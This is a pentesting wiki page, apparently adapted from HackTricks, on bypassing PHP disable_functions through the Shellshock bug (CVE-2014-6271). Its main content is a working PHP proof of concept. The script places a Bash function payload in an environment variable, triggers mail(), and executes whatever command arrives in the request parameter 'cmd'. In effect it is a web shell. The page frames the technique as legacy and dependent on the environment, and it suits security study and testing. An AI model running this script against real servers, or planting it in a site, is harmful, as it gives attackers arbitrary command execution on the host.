disable-functions-php-5-x-shellshock-exploit.md (2632B)
1 --- 2 title: "PHP 5.x Shellshock Command Execution" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # PHP 5.x Shellshock Command Execution 14 15 This historical technique relies on CVE-2014-6271 (Shellshock): vulnerable Bash versions execute commands appended to an exported function definition. The PHP proof of concept sets such an environment variable and invokes `mail()`, which may cause the local mail transport to start a vulnerable Bash process.<sup>[[1]](#references)[[2]](#references)</sup> 16 17 It works only when all of the required conditions are present, including a vulnerable Bash, `/bin/sh` resolving to Bash, a usable `mail()` path, and the relevant PHP functions not being disabled. It should therefore be treated as a legacy, environment-specific check.<sup>[[1]](#references)[[2]](#references)</sup> 18 19 On historical `safe_mode` configurations, PHP commonly allowed users to change only environment variables whose names began with the configured `safe_mode_allowed_env_vars` prefixes; the default prefix was `PHP_`. The proof of concept therefore uses the name `PHP_LOL` for the exported function payload.<sup>[[2]](#references)</sup> 20 21 ```php 22 <?php 23 echo "Disabled functions: " . ini_get('disable_functions') . "\n"; 24 25 function shellshock($cmd) { 26 // Execute a command through CVE-2014-6271 when the environment is vulnerable. 27 if (strstr(readlink('/bin/sh'), 'bash') === false) { 28 return 'Not vulnerable: /bin/sh is not Bash'; 29 } 30 31 $tmp = tempnam('.', 'data'); 32 putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); 33 mail('a@127.0.0.1', '', '', '', '-bv'); 34 35 $output = @file_get_contents($tmp); 36 @unlink($tmp); 37 38 return $output !== '' ? $output : 'No output, or the target is not vulnerable.'; 39 } 40 41 echo shellshock($_REQUEST['cmd']); 42 ?> 43 ``` 44 45 ## References 46 47 - [1] [NIST NVD - CVE-2014-6271](https://nvd.nist.gov/vuln/detail/CVE-2014-6271) 48 - [2] [SafeBuff - `disable_functions` bypass examples (archived)](https://web.archive.org/web/20170801153107/http://blog.safebuff.com:80/2016/05/06/disable-functions-bypass/)